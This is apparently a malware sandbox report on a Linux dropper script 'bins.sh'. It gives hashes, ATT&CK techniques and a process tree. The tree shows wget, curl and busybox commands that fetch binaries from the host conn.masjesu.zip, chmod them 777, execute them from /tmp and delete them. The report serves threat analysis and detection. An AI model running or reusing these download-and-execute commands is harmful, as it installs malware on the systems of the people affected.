4dd53d92e06fcea220f5b50d211376b0613ddac7a1e45e7b4cee9aa1fcca64b3

Analysis

max time kernel
149s
max time network
10s
platform
debian-9_armhf
resource
debian9-armhf-20240611-en
resource tags

arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem
submitted
01-11-2024 12:18

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

bins.sh
Size

10KB
MD5

08f97bfa89c4595b9341e1badc203a1f
SHA1

657966ff8f84e6740ec73c866fa7f4b4de36c12d
SHA256

4dd53d92e06fcea220f5b50d211376b0613ddac7a1e45e7b4cee9aa1fcca64b3
SHA512

f85495f56fcfd3d77a04043841616027128f716e38a7fa94e5f0c1ca5f7aa5b37592f3526cfe7fb83a5352b62dd79d963dd04e8348840c80bec49973d51459ee
SSDEEP

192:0o3Hi5tYV2SXY4/EVcZe0IUZqsPmIUZqsP3oO2SXY4j3Hi5tR:R9EVoe0

Score

7^/10

antivm defense_evasion discovery

Malware Config

Signatures

File and Directory Permissions Modification 1 TTPs 1 IoCs
Adversaries may modify file or directory permissions to evade defenses.
defense_evasion

Linux and Mac File and Directory Permissions Modification
T1222.002

Processes:

chmod

pid process

690 chmod
Executes dropped EXE 1 IoCs

Processes:

UB9kfLFJvty5WVXvRY5RoUScjExiNFOZEb

ioc pid process

/tmp/UB9kfLFJvty5WVXvRY5RoUScjExiNFOZEb 691 UB9kfLFJvty5WVXvRY5RoUScjExiNFOZEb
Checks CPU configuration 1 TTPs 2 IoCs
Checks CPU information which indicate if the system is a virtual machine.
antivm

System Checks
T1497.001

Processes:

curlcurl

description ioc process

File opened for reading /proc/cpuinfo curl
File opened for reading /proc/cpuinfo curl

pid	process
690	chmod

ioc	pid	process
/tmp/UB9kfLFJvty5WVXvRY5RoUScjExiNFOZEb	691	UB9kfLFJvty5WVXvRY5RoUScjExiNFOZEb

description	ioc	process
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl

Reads runtime system information 4 IoCs

Reads data from /proc virtual filesystem.

discovery

Processes:

curlcurl

description	ioc	process
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl

System Network Configuration Discovery 1 TTPs 5 IoCs
Adversaries may gather information about the network configuration of a system.
discovery

System Network Configuration Discovery
T1016

Processes:

wgetcurlbusyboxwgetcurl

pid process

670 wget
675 curl
688 busybox
695 wget
698 curl
Writes file to tmp directory 1 IoCs
Malware often drops required files in the /tmp directory.

Processes:

curl

description ioc process

File opened for modification /tmp/UB9kfLFJvty5WVXvRY5RoUScjExiNFOZEb curl

pid	process
670	wget
675	curl
688	busybox
695	wget
698	curl

description	ioc	process
File opened for modification	/tmp/UB9kfLFJvty5WVXvRY5RoUScjExiNFOZEb	curl

/tmp/bins.sh
/tmp/bins.sh
1⤵
PID:660

/bin/rm
/bin/rm bins.sh
2⤵
PID:668

/usr/bin/wget
wget http://conn.masjesu.zip/bins/UB9kfLFJvty5WVXvRY5RoUScjExiNFOZEb
2⤵
- System Network Configuration Discovery
PID:670

/usr/bin/curl
curl -O http://conn.masjesu.zip/bins/UB9kfLFJvty5WVXvRY5RoUScjExiNFOZEb
2⤵
- Checks CPU configuration
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:675

/bin/busybox
/bin/busybox wget http://conn.masjesu.zip/bins/UB9kfLFJvty5WVXvRY5RoUScjExiNFOZEb
2⤵
- System Network Configuration Discovery
PID:688

/bin/chmod
chmod 777 UB9kfLFJvty5WVXvRY5RoUScjExiNFOZEb
2⤵
- File and Directory Permissions Modification
PID:690

/tmp/UB9kfLFJvty5WVXvRY5RoUScjExiNFOZEb
./UB9kfLFJvty5WVXvRY5RoUScjExiNFOZEb
2⤵
- Executes dropped EXE
PID:691

/bin/rm
rm UB9kfLFJvty5WVXvRY5RoUScjExiNFOZEb
2⤵
PID:693

/usr/bin/wget
wget http://conn.masjesu.zip/bins/1Zn323IpR93DvERIdjrbVdlf9ZSTck2H4q
2⤵
- System Network Configuration Discovery
PID:695

/usr/bin/curl
curl -O http://conn.masjesu.zip/bins/1Zn323IpR93DvERIdjrbVdlf9ZSTck2H4q
2⤵
- Checks CPU configuration
- Reads runtime system information
- System Network Configuration Discovery
PID:698

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Virtualization/Sandbox Evasion

T1497

System Checks

T1497.001

Credential Access

Discovery

System Network Configuration Discovery

T1016

Virtualization/Sandbox Evasion

T1497

System Checks

T1497.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/UB9kfLFJvty5WVXvRY5RoUScjExiNFOZEb

Filesize
16B

MD5
7689ca8c5bc85cf6b78ef89323d4df6a

SHA1
a1392ec3b571b3de167f0b9a5dadab4f14a2db76

SHA256
17dcc5c5df80bfe98d30dd8eb7e0de5875d0e4560a0f23e5acb0b13ef1a1a3c5

SHA512
40f543b232d42b9b7796382c15de33e682111685ad7ae87be455d0d8d3e48866dfc137f4555b8bc6bf03ac5dde233c8f20e8c4f220c05c71892de0ce14691471

Download Submit